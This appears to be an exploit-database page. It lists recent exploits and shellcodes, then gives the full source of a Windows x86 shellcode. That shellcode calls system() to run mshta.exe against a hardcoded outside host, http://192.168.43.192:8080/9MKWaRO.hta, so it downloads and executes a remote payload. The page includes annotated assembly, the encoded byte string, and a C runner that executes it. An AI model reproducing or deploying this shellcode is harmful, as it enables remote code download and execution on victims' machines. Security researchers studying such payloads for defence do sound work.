
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
69 lines
No EOL
1.9 KiB
C
69 lines
No EOL
1.9 KiB
C
# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
|
|
# Shellcode Author: Siddharth Sharma
|
|
# Shellcode Length: ~100 bytes
|
|
# Tested on: WIN7x86
|
|
# Date: 2020-06-16
|
|
|
|
/*
|
|
|
|
#Description
|
|
# Simply, instead of using mshta.exe to download file as:
|
|
mshta.exe http://<IP>:<port>/<file_name.hta> ,
|
|
# We could use below shellcode that does the same.
|
|
|
|
|
|
|
|
=============================
|
|
xor eax, eax ;clear eax,get msvcrt.dll
|
|
mov ax, 0x7472 ;"tr\0\0"
|
|
push eax
|
|
push dword 0x6376736d ;cvsm
|
|
push esp
|
|
|
|
|
|
mov ebx,0x77e3395c ;call LoadLibraryA
|
|
call ebx
|
|
mov ebp,eax ;msvcrt.dll is saved in ebp
|
|
|
|
|
|
;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
|
|
xor eax,eax
|
|
PUSH eax
|
|
PUSH 0x6174682e ;".hta"
|
|
PUSH 0x4f526157 ;"WaRO"
|
|
PUSH 0x4b4d392f ;"/9MK"
|
|
PUSH 0x38303830 ;"8080"
|
|
PUSH 0x3a323931 ;"192:"
|
|
PUSH 0x2e33342e ;".43."
|
|
PUSH 0x3836312e ;".168"
|
|
PUSH 0x3239312f ;"/192"
|
|
PUSH 0x2f3a7074 ;"tp:/"
|
|
PUSH 0x74682065 ;"e ht"
|
|
PUSH 0x78652e61 ;"a.ex"
|
|
PUSH 0x7468736d ;"msht"
|
|
|
|
|
|
|
|
MOV EDI,ESP ;adding a pointer to the stack
|
|
PUSH EDI
|
|
|
|
|
|
Mov eax,0x6ffab16f ;call System
|
|
call eax
|
|
|
|
xor eax, eax
|
|
push eax
|
|
mov eax, 0x77e3214f ;call ExitProcess
|
|
call eax
|
|
=====================================
|
|
*/
|
|
|
|
|
|
char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
int(*func)();
|
|
func = (int(*)()) code;
|
|
(int)(*func)();
|
|
} |